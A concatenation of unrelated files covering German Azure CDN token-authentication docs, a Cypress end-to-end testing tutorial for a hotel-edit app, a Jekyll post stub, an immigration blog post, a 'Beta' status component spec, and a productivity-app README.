- Protokoll: Lassen Sie Anforderungen basierend auf dem Protokoll zu, das zum Anfordern des Inhalts verwendet wird, oder verweigern Sie solche Anforderungen.
- Ablaufzeit: Weisen Sie einen Datums- und Zeitbereich zu, um sicherzustellen, dass ein Link nur für eine begrenzte Zeit gültig bleibt.
Weitere Informationen finden Sie in den ausführlichen Konfigurationsbeispielen für jeden Parameter unter [Einrichten der Tokenauthentifizierung](#setting-up-token-authentication).
>[!IMPORTANT]
> Wenn die Tokenberechtigung für einen beliebigen Pfad für dieses Konto aktiviert ist, ist der Standardcachemodus der einzige Modus, der für die Zwischenspeicherung von Abfragezeichenfolgen verwendet werden kann. Weitere Informationen finden Sie unter [Steuern des Azure CDN-Zwischenspeicherverhaltens mit Abfragezeichenfolgen](cdn-query-string-premium.md).
## <a name="reference-architecture"></a>Referenzarchitektur
Im folgenden Workflowdiagramm wird beschrieben, wie das CDN die Tokenauthentifizierung verwendet, um mit der Web-App zu arbeiten.

## <a name="token-validation-logic-on-cdn-endpoint"></a>Tokenüberprüfungslogik auf dem CDN-Endpunkt
Im folgenden Flussdiagramm wird veranschaulicht, wie Azure CDN eine Clientanforderung überprüft, wenn die Tokenauthentifizierung auf dem CDN-Endpunkt konfiguriert ist.

## <a name="setting-up-token-authentication"></a>Einrichten der Tokenauthentifizierung
1. Navigieren Sie im [Azure-Portal](https://portal.azure.com) zu Ihrem CDN-Profil, und klicken Sie dann auf **Verwalten**, um das zusätzliche Portal zu starten.

2. Zeigen Sie mit der Maus auf **HTTP Large**, und klicken Sie im Flyout dann auf **Token Auth**. Sie können dann den Verschlüsselungsschlüssel und Verschlüsselungsparameter wie folgt einrichten:
1. Erstellen Sie einen oder mehrere Verschlüsselungsschlüssel. Bei einem Verschlüsselungsschlüssel muss die Groß-/Kleinschreibung beachtet werden, und er kann eine beliebige Kombination aus alphanumerischen Zeichen enthalten. Alle anderen Arten von Zeichen, einschließlich Leerzeichen, sind nicht zulässig. Die maximale Länge beträgt 250 Zeichen. Um sicherzustellen, dass die Verschlüsselungsschlüssel auf Zufallsbasis generiert werden, sollten sie mit dem [OpenSSL-Tool](https://www.openssl.org/) erstellt werden.
Das OpenSSL-Tool hat die folgende Syntax:
```rand -hex <key length>```
Beispiel:
```OpenSSL> rand -hex 32```
Erstellen Sie sowohl einen Primär- als auch einen Sicherungsschlüssel, um Downtime zu vermeiden. Ein Sicherungsschlüssel ermöglicht während der Aktualisierung des Primärschlüssels unterbrechungsfreien Zugriff auf Ihre Inhalte.
2. Geben Sie einen eindeutigen Verschlüsselungsschlüssel in das Feld **Primärschlüssel** ein, und geben Sie optional einen Sicherungsschlüssel in das Feld **Sicherungsschlüssel** ein.
3. Wählen Sie in der Liste **Minimum Encryption Version** (Verschlüsselungsmindestversion) die Verschlüsselungsmindestversion aus, und klicken Sie dann auf **Aktualisieren**:
- **V2**: Gibt an, dass mit dem Schlüssel Token der Versionen 2.0 und 3.0 generiert werden können. Verwenden Sie diese Option nur bei der Umstellung von einem älteren Verschlüsselungsschlüssel der Version 2.0 auf einen Schlüssel der Version 3.0.
- **V3**: (Empfohlen) Gibt an, dass mit dem Schlüssel nur Token der Version 3.0 generiert werden können.

4. Verwenden Sie das Verschlüsselungstool, um Verschlüsselungsparameter einzurichten und ein Token zu generieren. Mit dem Verschlüsselungstool können Sie Anforderungen basierend auf Ablaufzeit, Land/Region, Verweiser, Protokoll und Client-IP (in beliebigen Kombinationen) zulassen oder ablehnen. Anzahl und Art der Parameter, die zur Bildung eines Tokens kombiniert werden können, sind zwar nicht beschränkt, die Gesamtlänge des Tokens darf jedoch maximal 512 Zeichen betragen.

Geben Sie Werte für einen oder mehrere der folgenden Verschlüsselungsparameter im Abschnitt für das **Verschlüsselungstool** ein:
> [!div class="mx-tdCol2BreakAll"]
> <table>
> <tr>
> <th>Parametername</th>
> <th>BESCHREIBUNG</th>
> </tr>
> <tr>
> <td><b>ec_expire</b></td>
> <td>Dient dem Zuweisen einer Ablaufzeit zu einem Token. Nach Verstreichen dieser Zeit wird das Token ungültig. Anforderungen, die nach der Ablaufzeit übermittelt werden, werden abgelehnt. Dieser Parameter verwendet einen UNIX-Zeitstempel, der auf der Anzahl der Sekunden seit Beginn der UNIX-Standardepoche `1/1/1970 00:00:00 GMT` basiert. (Sie können Onlinetools für die Konvertierung zwischen der Standardzeit und der UNIX-Zeit verwenden.)>
> Wenn das Token beispielsweise am `12/31/2016 12:00:00 GMT` ablaufen soll, geben Sie den UNIX-Zeitstempelwert `1483185600` ein.
> </tr>
> <tr>
> <td><b>ec_url_allow</b></td>
> <td>Dient zum Anpassen von Token an ein bestimmtes Asset oder einen Pfad. Der Zugriff wird auf Anforderungen beschränkt, deren URL mit einem bestimmten relativen Pfad beginnt. Bei URLs wird die Groß-/Kleinschreibung berücksichtigt. Geben Sie mehrere Pfade ein, indem Sie als Trennzeichen jeweils ein Komma verwenden. Fügen Sie außerdem keine Leerzeichen hinzu. Je nach Ihren Anforderungen können Sie andere Werte angeben, um unterschiedliche Zugriffsebenen bereitzustellen.>
> Für die URL `http://www.mydomain.com/pictures/city/strasbourg.png` sind diese Anforderungen z.B. für die folgenden Eingabewerte zulässig:
> <ul>
> <li>Eingabewert `/`: Alle Anforderungen sind zulässig.</li>
> <li>Eingabewert `/pictures`: Die folgenden Anforderungen sind zulässig: <ul>
> <li>`http://www.mydomain.com/pictures.png`</li>
> <li>`http://www.mydomain.com/pictures/city/strasbourg.png`</li>
> <li>`http://www.mydomain.com/picturesnew/city/strasbourgh.png`</li>
> </ul></li>
> <li>Eingabewert `/pictures/`: Nur Anforderungen mit dem Pfad `/pictures/` sind zulässig. Beispiel: `http://www.mydomain.com/pictures/city/strasbourg.png`.</li>
> <li>Eingabewert `/pictures/city/strasbourg.png`: Nur Anforderungen für diesen speziellen Pfad und dieses Asset sind zulässig.</li>
> </ul>
> </tr>
> <tr>
> <td><b>ec_country_allow</b></td>
> <td>Es sind nur Anforderungen zulässig, die aus einem oder mehreren der angegebenen Länder/Regionen stammen. Anforderungen aus allen anderen Ländern/Regionen werden abgelehnt. Verwenden Sie für jedes Land/jede Region einen aus zwei Buchstaben bestehenden [Ländercode nach ISO 3166](/previous-versions/azure/mt761717(v=azure.100)). Trennen Sie alle Länder/Regionen jeweils mit einem Komma voneinander, und fügen Sie keine Leerzeichen ein. Beispiel: Wenn Sie den Zugriff nur aus den USA und aus Frankreich zulassen möchten, geben Sie `US,FR` ein.</td>
> </tr>
> <tr>
> <td><b>ec_country_deny</b></td>
> <td>Dient zum Ablehnen von Anforderungen, die aus einem oder mehreren angegebenen Ländern/Regionen stammen. Anforderungen aus allen anderen Ländern/Regionen werden zugelassen. Die Implementierung ist identisch mit dem <b>ec_country_allow</b>-Parameter. Ist ein Länder-/Regionscode sowohl im <b>ec_country_allow</b>-Parameter als auch im <b>ec_country_deny</b>-Parameter vorhanden, hat der <b>ec_country_allow</b>-Parameter Vorrang.</td>
> </tr>
> <tr>
> <td><b>ec_ref_allow</b></td>
> <td>Es werden nur Anforderungen vom angegebenen Verweiser zugelassen. Mit einem Verweiser wird die URL der Webseite identifiziert, die als Link zur angeforderten Ressource dient. Nehmen Sie das Protokoll nicht in den Parameterwert auf.>
> Die folgenden Eingabetypen sind zulässig:
> <ul>
> <li>Ein Hostname oder ein Hostname und ein Pfad.</li>
> <li>Mehrere Verweiser. Um mehrere Verweiser hinzuzufügen, trennen Sie sie durch Kommas und fügen Sie kein Leerzeichen hinzu. Wenn Sie einen Verweiserwert angeben, die entsprechenden Informationen aufgrund der Browserkonfiguration aber nicht mit der Anforderung gesendet werden, wird die Anforderung standardmäßig abgelehnt.</li>
> <li>Anforderungen mit fehlenden oder leeren Verweiserinformationen. Standardmäßig blockiert der Parameter <b>ec_ref_allow</b> diese Anforderungstypen. Um solche Anforderungen zuzulassen, geben Sie entweder den Text „missing“ oder einen leeren Wert (unter Verwendung eines nachgestellten Kommas) ein.</li>
> <li>Unterdomänen. Um Unterdomänen zuzulassen, geben Sie ein Sternchen (\*) ein. Um beispielsweise alle Unterdomänen von `contoso.com` zuzulassen, geben Sie `*.contoso.com` ein.</li>
> </ul>
> Beispielsweise geben Sie `www.contoso.com,*.contoso.com,missing` ein, um Zugriff für Anforderungen von `www.contoso.com`, allen Unterdomänen unter `contoso2.com` und Anforderungen mit leeren oder fehlenden Verweisern zuzulassen.</td>
> </tr>
> <tr>
> <td><b>ec_ref_deny</b></td>
> <td>Dient zum Ablehnen von Anforderungen über den angegebenen Verweiser. Die Implementierung ist identisch mit dem <b>ec_ref_allow</b>-Parameter. Ist ein Verweiser sowohl im <b>ec_ref_allow</b>- als auch im <b>ec_ref_deny</b>-Parameter vorhanden, dann hat der Parameter <b>ec_ref_allow</b> Vorrang.</td>
> </tr>
> <tr>
> <td><b>ec_proto_allow</b></td>
> <td>Es werden nur Anforderungen vom angegebenen Protokoll zugelassen. Gültige Werte sind `http`, `https` oder `http,https`.</td>
> </tr>
> <tr>
> <td><b>ec_proto_deny</b></td>
> <td>Dient zum Ablehnen von Anforderungen vom angegebenen Protokoll. Die Implementierung ist identisch mit dem <b>ec_proto_allow</b>-Parameter. Ist ein Protokoll sowohl im <b>ec_proto_allow</b>- als auch im <b>ec_proto_deny</b>-Parameter vorhanden, dann hat der Parameter <b>ec_proto_allow</b> Vorrang.</td>
> </tr>
> <tr>
> <td><b>ec_clientip</b></td>
> <td>Beschränkt den Zugriff auf die IP-Adresse der angegebenen anfordernden Person. IPv4 und IPv6 werden unterstützt. Sie können entweder eine einzelne Anforderungs-IP-Adresse oder einem bestimmten Subnetz zugeordnete IP-Adressen angeben. Beispielsweise gestattet `11.22.33.0/22` Anforderungen der IP-Adressen 11.22.32.1 bis 11.22.35.254.</td>
> </tr>
> </table>
5. Nach der Eingabe von Werten für die Verschlüsselungsparameter wählen Sie den Schlüssel zum Verschlüsseln (wenn Sie einen Primär- und einen Sicherungsschlüssel erstellt haben) aus der Liste **Schlüssel zum Verschlüsseln** aus.
6. Wählen Sie in der Liste **Verschlüsselungsversion** eine Verschlüsselungsversion aus: **V2** für Version 2 oder **V3** für Version 3 (empfohlen).
7. Klicken Sie auf **Verschlüsseln**, um das Token zu generieren.
Nachdem das Token generiert wurde, wird es im Feld **Generated Token** (Generiertes Token) angezeigt. Zur Verwendung des Tokens fügen Sie es als Abfragezeichenfolge am Ende der Datei im URL-Pfad ein. Beispiel: `http://www.domain.com/content.mov?a4fbc3710fd3449a7c99986b`.
8. Testen Sie Ihr Token optional mit dem Entschlüsselungstool, um die Parameter Ihres Tokens anzuzeigen. Fügen Sie den Tokenwert in das Feld **Token zum Entschlüsseln** ein. Wählen Sie den zu verwendenden Verschlüsselungsschlüssel aus der Liste **Schlüssel zum Entschlüsseln** aus, und klicken Sie auf **Entschlüsseln**.
Nach der Entschlüsselung des Tokens werden seine Parameter im Feld **Ursprüngliche Parameter** angezeigt.
9. Passen Sie optional den Typ des Antwortcodes an, der zurückgegeben wird, wenn eine Anforderung abgelehnt wird. Wählen Sie **Aktiviert** aus, und wählen Sie dann den Antwortcode aus der Liste **Antwortcode** aus. **Headername** wird automatisch auf **Speicherort** festgelegt. Klicken Sie auf **Speichern**, um den neuen Antwortcode zu implementieren. Für bestimmte Antwortcodes müssen Sie auch die URL Ihrer Fehlerseite in das Feld **Headerwert** eingeben. Der Antwortcode **403** („Unzulässig“) ist standardmäßig aktiviert.
3. Klicken Sie unter **HTTP Large** auf **Regel-Engine**. Sie verwenden die Regel-Engine, um Pfade zum Anwenden der Funktion zu definieren und die Tokenauthentifizierung sowie weitere Funktionen zur Tokenauthentifizierung zu aktivieren. Weitere Informationen finden Sie unter [Azure CDN-Regel-Engine](cdn-rules-engine-reference.md).
1. Wählen Sie eine vorhandene Regel aus, oder erstellen Sie eine neue Regel, um das Asset oder den Pfad zu definieren, auf das bzw. den Sie die Tokenauthentifizierung anwenden möchten.
2. Zum Aktivieren der Tokenauthentifizierung für eine Regel wählen Sie **[Token Auth](https://docs.vdms.com/cdn/Content/HRE/F/Token-Auth.htm)** aus der Liste **Features** und dann **Aktiviert** aus. Klicken Sie auf **Aktualisieren**, wenn Sie eine Regel aktualisieren, oder auf **Hinzufügen**, wenn Sie eine Regel erstellen.

4. In der Regel-Engine können Sie auch weitere Features im Zusammenhang mit der Tokenauthentifizierung aktivieren. Um die folgenden Features zu aktivieren, wählen Sie sie in der Liste **Features** aus, und wählen Sie dann **Aktiviert** aus.
- **[Token Auth Denial Code:](https://docs.vdms.com/cdn/Content/HRE/F/Token-Auth-Denial-Code.htm)** Gibt den Typ der Antwort an, die an einen Benutzer zurückgegeben wird, wenn eine Anforderung abgelehnt wird. Hier festgelegte Regeln setzen den Antwortcode außer Kraft, der im Abschnitt **Custom Denial Handling** auf der Seite für die tokenbasierte Authentifizierung festgelegt wurde.
- **[Token Auth Ignore URL Case:](https://docs.vdms.com/cdn/Content/HRE/F/Token-Auth-Ignore-URL-Case.htm)** Legt fest, ob für die zum Überprüfen des Tokens verwendete URL die Groß-/Kleinschreibung berücksichtigt wird.
- **[Token Auth Parameter:](https://docs.vdms.com/cdn/Content/HRE/F/Token-Auth-Parameter.htm)** Benennt den Parameter der Abfragezeichenfolge für die Tokenauthentifizierung, der in der angeforderten URL angezeigt wird, um.

5. Sie können Ihr Token anpassen, indem Sie auf Quellcode in [GitHub](https://github.com/VerizonDigital/ectoken) zugreifen.
Verfügbare Sprachen:
- C
- C#
- PHP
- Perl
- Java
- Python
## <a name="azure-cdn-features-and-provider-pricing"></a>Preise für Azure CDN-Funktionen und -Anbieter
Weitere Informationen zu Funktionen finden Sie unter [Azure CDN-Produktfeatures](cdn-features.md). Weitere Informationen zur Preisgestaltung finden Sie unter [Azure Content Delivery Network – Preise ](https://azure.microsoft.com/pricing/details/cdn/).
| 90.034483 | 604 | 0.760628 | deu_Latn | 0.996803 |
e03e4bccffcd0dde895786f753d92e4fa5d72023 | 7,459 | md | Markdown | 05-testing/03-e2e/06-edit-hotel/README.md | AghLearning/master-frontend-lemoncode | 1efe6576cdf00cb3e15cde9cc3916e6ce4759f29 | [
"MIT"
] | null | null | null | 05-testing/03-e2e/06-edit-hotel/README.md | AghLearning/master-frontend-lemoncode | 1efe6576cdf00cb3e15cde9cc3916e6ce4759f29 | [
"MIT"
] | null | null | null | 05-testing/03-e2e/06-edit-hotel/README.md | AghLearning/master-frontend-lemoncode | 1efe6576cdf00cb3e15cde9cc3916e6ce4759f29 | [
"MIT"
] | null | null | null | # 06 Edit hotel
In this example we are going to test a `hotel edit`.
We will start from `05-custom-commands`.
# Steps to build it
- `npm install` to install previous sample packages:
```bash
npm install
```
- To edit an hotel we need to visit `hotels` and click on edit button:
### ./cypress/integration/hotel-edit.spec.ts
```javascript
describe('Hotel edit specs', () => {
it('should navigate to second hotel when click on edit second hotel', () => {
// Arrange
// Act
// Assert
});
});
```
- To get available `edit button selector`, we need to add accessibility label:
### ./src/pods/hotel-collection/components/hotel-card.component.tsx
```diff
...
<CardActions>
<IconButton
+ aria-label="Edit hotel"
onClick={() => history.push(linkRoutes.hotelEdit(hotel.id))}
>
<EditIcon />
</IconButton>
</CardActions>
```
- Add spec:
### ./cypress/integration/hotel-edit.spec.ts
```diff
...
it('should navigate to second hotel when click on edit second hotel', () => {
// Arrange
// Act
+ cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.findAllByRole('button', { name: 'Edit hotel' }).then((buttons) => {
+ buttons[1].click();
+ });
// Assert
+ cy.url().should('eq', 'http://localhost:8080/#/hotel-edit/2');
});
```
- Add update hotel spec:
### ./cypress/integration/hotel-edit.spec.ts
```diff
...
+ it('should update hotel name when it edits an hotel and click on save button', () => {
+ // Arrange
+ // Act
+ cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.findAllByRole('button', { name: 'Edit hotel' }).then((buttons) => {
+ buttons[1].click();
+ });
+ cy.findByLabelText('Name').clear().type('Updated hotel two');
+ cy.findByRole('button', { name: 'Save' }).click();
+ // Assert
+ cy.findByText('Updated hotel two');
+ });
```
- The previous spec could works or not, due to we are not waiting to be resolved the get hotel request. If we change network to `Slow 3G` on `Chrome options` to simulate it, we will need do something like:
### ./cypress/integration/hotel-edit.spec.ts
```diff
...
it('should update hotel name when it edits an hotel and click on save button', () => {
// Arrange
// Act
cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.intercept('GET', '/api/hotels/2').as('loadHotel');
cy.findAllByRole('button', { name: 'Edit hotel' }).then((buttons) => {
buttons[1].click();
});
+ cy.wait('@loadHotel');
+ cy.findByLabelText('Name').should('not.have.value', '');
cy.findByLabelText('Name').clear().type('Updated hotel two');
cy.findByRole('button', { name: 'Save' }).click();
// Assert
+ cy.wait('@load'); // TODO: Refactor custom command loadAndVisit
cy.findByText('Updated hotel two');
});
```
> Notice: some this has to wait until it has some value.
- Refactor command:
### ./cypress/support/commands.ts
```diff
+ interface Resource {
+ path: string;
+ fixture?: string;
+ alias?: string;
+ }
Cypress.Commands.add(
'loadAndVisit',
- (apiPath: string, routePath: string, fixture?: string) => {
+ (visitUrl: string, resources: Resource[], callbackAfterVisit?: () => void) => {
- Boolean(fixture)
- ? cy.intercept('GET', apiPath, { fixture }).as('load')
- : cy.intercept('GET', apiPath).as('load');
+ const aliasList = resources.map((resource, index) => {
+ const alias = resource.alias || `load-${index}`;
+ Boolean(resource.fixture)
+ ? cy
+ .intercept('GET', resource.path, { fixture: resource.fixture })
+ .as(alias)
+ : cy.intercept('GET', resource.path).as(alias);
+ return alias;
+ });
- cy.visit(routePath);
+ cy.visit(visitUrl);
+ if (callbackAfterVisit) {
+ callbackAfterVisit();
+ }
- cy.wait('@load');
+ aliasList.forEach((alias) => {
+ cy.wait(`@${alias}`);
+ });
}
);
```
- Update `d.ts`:
### ./cypress/support/index.d.ts
```diff
declare namespace Cypress {
+ interface Resource {
+ path: string;
+ fixture?: string;
+ alias?: string;
+ }
interface Chainable {
loadAndVisit(
- apiPath: string,
+ visitUrl: string,
- routePath: string,
+ resources: Resource[],
- fixture?: string
+ callbackAfterVisit?: () => void
): Chainable<Element>;
}
}
```
- Update specs:
### ./cypress/integration/hotel-edit.spec.ts
```diff
...
it('should navigate to second hotel when click on edit second hotel', () => {
// Arrange
// Act
- cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.loadAndVisit('/hotel-collection', [{ path: '/api/hotels' }]);
cy.findAllByRole('button', { name: 'Edit hotel' }).then((buttons) => {
buttons[1].click();
});
// Assert
cy.url().should('eq', 'http://localhost:8080/#/hotel-edit/2');
});
it('should update hotel name when it edits an hotel and click on save button', () => {
// Arrange
// Act
- cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.loadAndVisit(
+ '/hotel-collection',
+ [
+ { path: '/api/hotels', alias: 'loadHotels' },
+ { path: '/api/hotels/2' },
+ { path: '/api/cities' },
+ ],
+ () => {
+ cy.findAllByRole('button', { name: 'Edit hotel' }).then((buttons) => {
+ buttons[1].click();
+ });
+ }
+ );
- cy.intercept('GET', '/api/hotels/2').as('loadHotel');
- cy.findAllByRole('button', { name: 'Edit hotel' }).then((buttons) => {
- buttons[1].click();
- });
- cy.wait('@loadHotel');
cy.findByLabelText('Name').should('not.have.value', '');
cy.findByLabelText('Name').clear().type('Updated hotel two');
cy.findByRole('button', { name: 'Save' }).click();
// Assert
- cy.wait('@load'); // TODO: Refactor custom command loadAndVisit
+ cy.wait('@loadHotels');
cy.findByText('Updated hotel two');
});
```
### ./cypress/integration/hotel-collection.spec.ts
```diff
...
it('should fetch hotel list and show it in screen when visit /hotel-collection url', () => {
// Arrange
// Act
- cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.loadAndVisit('/hotel-collection', [{ path: '/api/hotels' }]);
// Assert
cy.findAllByRole('listitem').should('have.length', 10);
});
it('should fetch hotel list greater than 0 when visit /hotel-collection url', () => {
// Arrange
// Act
- cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.loadAndVisit('/hotel-collection', [{ path: '/api/hotels' }]);
// Assert
cy.findAllByRole('listitem').should('have.length.greaterThan', 0);
});
it('should fetch two hotels when visit /hotel-collection url', () => {
// Arrange
// Act
- cy.loadAndVisit('/api/hotels', '/hotel-collection', 'hotels.json');
+ cy.loadAndVisit('/hotel-collection', [
+ { path: '/api/hotels', fixture: 'hotels.json' },
+ ]);
// Assert
cy.findAllByRole('listitem').should('have.length', 2);
});
```
# About Basefactor + Lemoncode
We are an innovating team of Javascript experts, passionate about turning your ideas into robust products.
[Basefactor, consultancy by Lemoncode](http://www.basefactor.com) provides consultancy and coaching services.
[Lemoncode](http://lemoncode.net/services/en/#en-home) provides training services.
For the LATAM/Spanish audience we are running an Online Front End Master degree, more info: http://lemoncode.net/master-frontend
| 24.536184 | 205 | 0.609733 | eng_Latn | 0.457073 |
e03f03c7268bbebd3b211c2978babd689123080a | 218 | md | Markdown | _watches/M20211223_034734_TLP_3.md | Meteoros-Floripa/meteoros.floripa.br | 7d296fb8d630a4e5fec9ab1a3fb6050420fc0dad | [
"MIT"
] | 5 | 2020-01-22T17:44:06.000Z | 2020-01-26T17:57:58.000Z | _watches/M20211223_034734_TLP_3.md | Meteoros-Floripa/site | 764cf471d85a6b498873610e4f3b30efd1fd9fae | [
"MIT"
] | null | null | null | _watches/M20211223_034734_TLP_3.md | Meteoros-Floripa/site | 764cf471d85a6b498873610e4f3b30efd1fd9fae | [
"MIT"
] | null | null | null | ---
layout: watch
title: TLP3 - 23/12/2021 - M20211223_034734_TLP_3T.jpg
date: 2021-12-23 03:47:34
permalink: /2021/12/23/watch/M20211223_034734_TLP_3
capture: TLP3/2021/202112/20211222/M20211223_034734_TLP_3T.jpg
---
| 27.25 | 62 | 0.784404 | fra_Latn | 0.041028 |
e03f0a3facc75ac338d92b19ee5ef6ece37a4146 | 364 | md | Markdown | split2/_posts/2016-07-16-Om daamodaraaya namaha 108 times.md | gbuk21/HinduGodsEnglish | b883907ef10e8beaa6030070fc2b8181152def47 | [
"MIT"
] | null | null | null | split2/_posts/2016-07-16-Om daamodaraaya namaha 108 times.md | gbuk21/HinduGodsEnglish | b883907ef10e8beaa6030070fc2b8181152def47 | [
"MIT"
] | null | null | null | split2/_posts/2016-07-16-Om daamodaraaya namaha 108 times.md | gbuk21/HinduGodsEnglish | b883907ef10e8beaa6030070fc2b8181152def47 | [
"MIT"
] | null | null | null | ---
layout: post
last_modified_at: 2021-03-30
title: om daamodaraaya namaha 108 times
youtubeId: Tm4bWbtIN5w
---
Om Sarvaasrayaya kramaya nama
- Who has discipline in everything
{% include youtubePlayer.html id=page.youtubeId %}
[Next]({{ site.baseurl }}{% link split2/_posts/2016-07-15-Om mahaatapase namaha 108 times.md%})
| 13 | 96 | 0.681319 | eng_Latn | 0.405821 |
e0401a84b8f02476cf43c0ae51a307b0561f4e7a | 3,398 | md | Markdown | components/beta/README.md | ty2k/design-system | 34889ae5e8ac6446b20936249d15acd064c00984 | [
"Apache-2.0"
] | 34 | 2018-12-03T18:48:23.000Z | 2022-02-28T22:14:08.000Z | components/beta/README.md | ty2k/design-system | 34889ae5e8ac6446b20936249d15acd064c00984 | [
"Apache-2.0"
] | 190 | 2018-10-16T21:13:41.000Z | 2021-12-01T17:24:29.000Z | components/beta/README.md | ty2k/design-system | 34889ae5e8ac6446b20936249d15acd064c00984 | [
"Apache-2.0"
] | 37 | 2018-10-10T19:15:35.000Z | 2022-01-10T13:36:10.000Z | ---
description: Beta status indicator
title: Beta Status
status: Draft
author: dlevine
---

> Last Updated: February 22, 2019
# Beta Status
The beta status indicator tells users that the product is still being worked on.
## Example
<component-preview path="components/beta/sample.html" height="100px" width="800px"> </component-preview>
## Use This For:
* Indicating your service is still being worked on and things may change.
## Don't Use This when:
* Your service is live and is no longer being actively worked on.
## Rationale
* The beta text has no border so users don't confuse the status for a button
* The text is visually distinct from the service name
Discuss this design on the [Beta Status Github Issue](https://github.com/bcgov/design-system/issues/78)
## Behaviour
1. Additional research is being done for users to interact or understand the meaning of Beta.
## Accessibility
This component has been built according to [WCAG 2.0 AA](https://www.w3.org/TR/WCAG20/) standards and all government services should strive to meet this level. This component successfully includes the following accessibility features:
### Screen readers
(coming soon)
### Colour Contrast
* Gold text exceeds a 7:1 [contrast ratio](https://webaim.org/articles/contrast/) on the header blue background
## Code
### HTML
```html
<!--
All in-line CSS is specific to this sample; it can and should be ignored.
-->
<header>
<div class="banner">
<a href="https://gov.bc.ca" alt="British Columbia">
<img src="../assets/images/logo-banner.svg" alt="Go to the Government of British Columbia website" />
</a>
<h1>Hello British Columbia</h1>
<div aria-label="This application is currently in Beta phase" class=Beta-PhaseBanner>
Beta
</div>
</div>
<div class="other">
<!--
This place is for anything that needs to be right aligned
beside the logo.
-->
</div>
</div>
</header>
```
### CSS
```css
header {
background-color: #036;
border-bottom: 2px solid #fcba19;
padding: 0 65px 0 65px;
color: #fff;
display: flex;
height: 65px;
top: 0px;
position: fixed;
width: 100%;
}
header h1 {
font-family: ‘BCSans’, ‘Noto Sans’, Verdana, Arial, sans-serif;
font-weight: normal; /* 400 */
margin: 5px 5px 0 18px;
visibility: hidden;
}
header .banner {
display: flex;
justify-content: flex-start;
align-items: center;
margin: 0 10px 0 0;
/* border-style: dotted;
border-width: 1px;
border-color: lightgrey; */
}
header .other {
display: flex;
flex-grow: 1;
/* border-style: dotted;
border-width: 1px;
border-color: lightgrey; */
}
.Beta-PhaseBanner {
color: #fcba19;
margin-top: -1em;
text-transform: uppercase;
font-weight: 600;
font-size: 16px;
}
:focus {
outline: 4px solid #3B99FC;
outline-offset: 1px;
}
/*
These are sample media queries only. Media queries are quite subjective
but, in general, should be made for the three different classes of screen
size: phone, tablet, full.
*/
@media screen and (min-width: 600px) and (max-width: 899px) {
header h1 {
font-size: calc(7px + 2.2vw);
visibility: visible;
}
}
@media screen and (min-width: 900px) {
header h1 {
font-size: 2.0em;
visibility: visible;
}
}
```
| 23.597222 | 235 | 0.677163 | eng_Latn | 0.939706 |
e0405f4a8f5dcf88861d445da292b5b9ea409e82 | 1,505 | md | Markdown | src/pages/news/2019-03-03---fraudsters-beware-the-ato-is-sharing-employment-data-with-the-department-of-home-affairs.md | adrienlozano/stephaniewebsite | b71ac3b17976b4c24686d2e929250fa5b0150713 | [
"MIT"
] | 1 | 2018-06-01T17:28:50.000Z | 2018-06-01T17:28:50.000Z | src/pages/news/2019-03-03---fraudsters-beware-the-ato-is-sharing-employment-data-with-the-department-of-home-affairs.md | adrienlozano/stephaniewebsite | b71ac3b17976b4c24686d2e929250fa5b0150713 | [
"MIT"
] | 3 | 2021-03-09T03:31:21.000Z | 2021-09-20T23:55:04.000Z | src/pages/news/2019-03-03---fraudsters-beware-the-ato-is-sharing-employment-data-with-the-department-of-home-affairs.md | adrienlozano/stephaniewebsite | b71ac3b17976b4c24686d2e929250fa5b0150713 | [
"MIT"
] | null | null | null | ---
title: >-
Fraudsters Beware: the ATO is Sharing Employment Data with the Department of
Home Affairs
date: '2019-03-03T00:00:00.000Z'
caption: >-
The ATO is sharing data with the Department of Home Affairs to ensure that
business sponsors are complying with their sponsorship obligations and visa
holders are complying with their visa conditions.
image: /images/Warning.PNG
tags:
- Temporary Work (Skilled)
- subclass 457
- Temporary Skills Shortage
- subclass 482
---
The ATO is sharing data with the Department of Home Affairs to
ensure that business sponsors are complying with their sponsorship obligations
and visa holders are complying with their visa conditions. A finding of non-compliance could be used to cancel a
business’ sponsorship approval or a sponsored worker’s visa.
The data exchange is occurring in relation to people who
currently hold or have held a Temporary
Work (Skilled) (subclass 457) or Temporary Skills Shortage (subclass 482)
primary visa in the three most recently completed financial years and their
respective business sponsors.
The type of information the ATO is sharing with the Department of Home Affairs includes:
* How much a business is paying a sponsored visa holder;
* Whether a visa holder is only working for their approved employer; and
* Whether a visa holder is only working in their approved occupation.
If
you need advice or assistance with an employer sponsored visa, contact the experienced staff at Moore
Migration today.
| 35.833333 | 113 | 0.791362 | eng_Latn | 0.999721 |
e04082fc089ee6df3b30255d3c0fb78c5e351311 | 2,152 | md | Markdown | README.md | Olian04/get-shit-done | 86ea14d732588daf89bbc05b6ce5166e4a6f089c | [
"MIT"
] | null | null | null | README.md | Olian04/get-shit-done | 86ea14d732588daf89bbc05b6ce5166e4a6f089c | [
"MIT"
] | null | null | null | README.md | Olian04/get-shit-done | 86ea14d732588daf89bbc05b6ce5166e4a6f089c | [
"MIT"
] | null | null | null | # get-shit-done
A timekeeping webb app that helps you get shit done. Inspired by pomodoro, It allows you to define your own rewardsystem, where the reward is break time.
Ex:
• gain 5 min break time every 20 min of work (regular pomodoro)
• continously gain 5% of time spent working as break time
• gain 1 min break time every time you press a button
• gain 5 min break time every 3rd time you press a button
The app UI consists of 2 vertical segments. Break time, and work time. Break time (at the top of the screen) shows you a button that says take a break, along with a clock indicating how much break time you have earned.
Work time (the lower segment) shows a grid of the reward systems currently in use. One might be a timer, one could be a button, another might be a continuous counting number with a % converted to break time.
Once you click take a break, the lower half of the screen shrinks and the top half grows to almost fill the entire screen. It then starts counting down the break timer, showing the text "Enjoy your break", while the lower haf shows "Get back to work?".
Creating your own reward system:
The edit page allows the user to have between 1 and 9 simultaneous reward systems at once. It also allows the user to place the systems in a 3x3 grid. Once placed the grid shrinks to the smallest it can be while still accommodating all of the systems the user placed in it, and respecting their placements.
Ex:
1 0 0 1 0
0 1 0 shrinks to 0 1
0 0 0
1 1 0
0 0 0 doesn't shrink
1 0 1
The shrinkage only happens from right to left and from bottom to top.
Dev notes:
Pages needed:
- main page (houses menu button, split segments for work page & break page)
- work page
- break page
- edit reward systems & layout
- config one reward system
## Project setup
```
npm install
```
### Compiles and hot-reloads for development
```
npm run serve
```
### Compiles and minifies for production
```
